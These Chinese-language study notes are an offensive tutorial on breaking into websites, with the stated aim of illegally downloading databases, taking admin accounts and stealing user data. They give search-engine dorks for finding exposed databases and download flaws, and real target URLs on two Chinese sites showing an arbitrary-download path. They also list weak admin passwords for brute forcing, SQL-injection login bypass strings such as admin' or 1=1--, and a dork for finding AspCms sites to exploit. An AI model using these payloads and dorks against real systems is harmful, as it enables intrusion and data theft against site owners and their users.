弱漏洞
一·网站爆库漏洞
暴库,就是通过一些技术手段或者程序漏洞得到数据的地址,并将数据非法下载到本地。
得到数据后我们可以:
1.得到网站管理账号
2.破坏、管理网站
3.得到用户信息
4.获得更高权限
access数据库是文件形式,容易攻击
暴库利用方法:
1.(目录便利漏洞)
在百度中搜索:转到父目录
就会显示目录便利的页面,可以在里面看到所有目录和文件,如果里面有数据库路径,点开、并下载就可以了。
不过我现在搜了后,这些搜索BUG已经被修复。
2.像access数据库
一般记录数据库连接都在 lnc/conn.asp 或者 lnc%5cconn.asp这个文件中
在网站后加
/xyconn.asp::$data 可能暴露出源代码,然后在里面找到数据库连接下载就行。
3.高级语法暴库
inurl:./…admin…/…add…
inurl:./…admin…/…del…
inurl:/.asp<id=<%<%<%
百度搜索可能会出现一些暴库的网站。
site:qq.com 转到父目录
看看qq.com有没有这个漏洞。
二·下载漏洞
http://ipo.snnu.edu.cn/
http://ipo.snnu.edu.cn/shida/UploadFiles/indentAttFile/2012061222041778.doc
http://ipo.snnu.edu.cn/down.asp?fileup=shida/UploadFiles/indentAttfile/2012061222041778.doc
http://www.sxzzy.cn/hhjs/news/**down.asp?FileName=**doc/2012-512012053010329973.doc
inurl:down.asp?FileName=
配合
site:
可以找到下载漏洞
下载漏洞利用
·通过蜘蛛爬行
·找到该url
·下载 conn.asp,config.php,config.asp,下载到数据库连接文件,然后去获取数据库的一些连接信息。
·db.mdb
三·网站后台密码爆破
用BurpSuite工具,当然我没有这个工具
例如:admin,admin123,admin88,admin321,域名888,域名.com,123456,654321········
四·逻辑万能密钥
’or’=‘or’
Admin’ or 1=1–
admin’ or ‘1’='1
用单引号把查询password的语句给逻辑掉了,只让其检测用户名admin,把后面注入掉了。
五·破解工具
BurpSuite
Discuz破解器
一些python密码破解脚本
httpfuzzer→针对带验证码的
由于没有工具,我就跳过叙述了。
六·网站漏洞EXP利用
EXP是exploit(漏洞利用)的缩写
EXP利用,主流网站漏洞基本上都有漏洞和exp
百度搜索:Powerd by AspCms2.0
就把使用cms的网站搜出来了。